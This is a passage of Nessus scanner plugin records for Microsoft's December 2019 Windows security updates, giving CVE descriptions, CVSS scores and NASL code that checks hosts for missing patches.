(CVE-2019-1485)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4530702/windows-8-1-kb4530702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4530730/windows-8-1-kb4530730\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4530730 or Cumulative Update KB4530702.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530702', '4530730');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530702, 4530730])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T10:36:54", "description": "The remote Windows host is missing security update 4530698\nor cumulative update 4530691. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. 
An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2019-1485)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-12-10T00:00:00", "title": "KB4530698: Windows Server 2012 December 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2019-12-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530691.NASL", "href": "https://www.tenable.com/plugins/nessus/131928", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131928);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/31\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1474\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530698\");\n script_xref(name:\"MSKB\", value:\"4530691\");\n script_xref(name:\"MSFT\", value:\"MS19-4530698\");\n script_xref(name:\"MSFT\", value:\"MS19-4530691\");\n\n script_name(english:\"KB4530698: Windows Server 2012 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530698\nor cumulative update 4530691. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. 
(CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530698/windows-server-2012-update-kb4530698\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?41f8c8b1\");\n # https://support.microsoft.com/en-us/help/4530691/windows-server-2012-update-kb4530691\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c69ab12f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4530698 or Cumulative Update KB4530691.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530698', '4530691');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530698, 4530691])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T10:36:54", "description": "The remote Windows host is missing security update 4530719\nor cumulative update 4530695. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. 
An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. 
(CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles COM object creation. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code with elevated privileges.\n (CVE-2019-1478)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-12-10T00:00:00", "title": "KB4530719: Windows Server 2008 December 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1478", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2019-12-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530695.NASL", "href": "https://www.tenable.com/plugins/nessus/131929", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131929);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/31\");\n\n script_cve_id(\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1474\",\n \"CVE-2019-1478\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530719\");\n script_xref(name:\"MSKB\", value:\"4530695\");\n script_xref(name:\"MSFT\", value:\"MS19-4530719\");\n script_xref(name:\"MSFT\", value:\"MS19-4530695\");\n\n script_name(english:\"KB4530719: Windows Server 2008 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530719\nor cumulative update 4530695. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles COM object creation. 
An\n attacker who successfully exploited the vulnerability\n could run arbitrary code with elevated privileges.\n (CVE-2019-1478)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530719/windows-server-2008-update-kb4530719\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0050734\");\n # https://support.microsoft.com/en-us/help/4530695/windows-server-2008-update-kb4530695\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4b9efd1a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4530719 or Cumulative Update KB4530695.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530695', '4530719');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530695, 4530719])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T10:36:55", "description": "The remote Windows host is missing security update 4530692\nor cumulative update 4530734. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. 
(CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles COM object creation. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code with elevated privileges.\n (CVE-2019-1478)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2019-1485)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-12-10T00:00:00", "title": "KB4530692: Windows 7 and Windows Server 2008 R2 December 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1478", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2019-12-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530734.NASL", "href": "https://www.tenable.com/plugins/nessus/131934", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131934);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/31\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1474\",\n \"CVE-2019-1478\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530734\");\n script_xref(name:\"MSKB\", value:\"4530692\");\n script_xref(name:\"MSFT\", value:\"MS19-4530734\");\n script_xref(name:\"MSFT\", value:\"MS19-4530692\");\n script_xref(name:\"IAVA\", value:\"2019-A-0450\");\n\n script_name(english:\"KB4530692: Windows 7 and Windows Server 2008 R2 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530692\nor cumulative update 4530734. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to 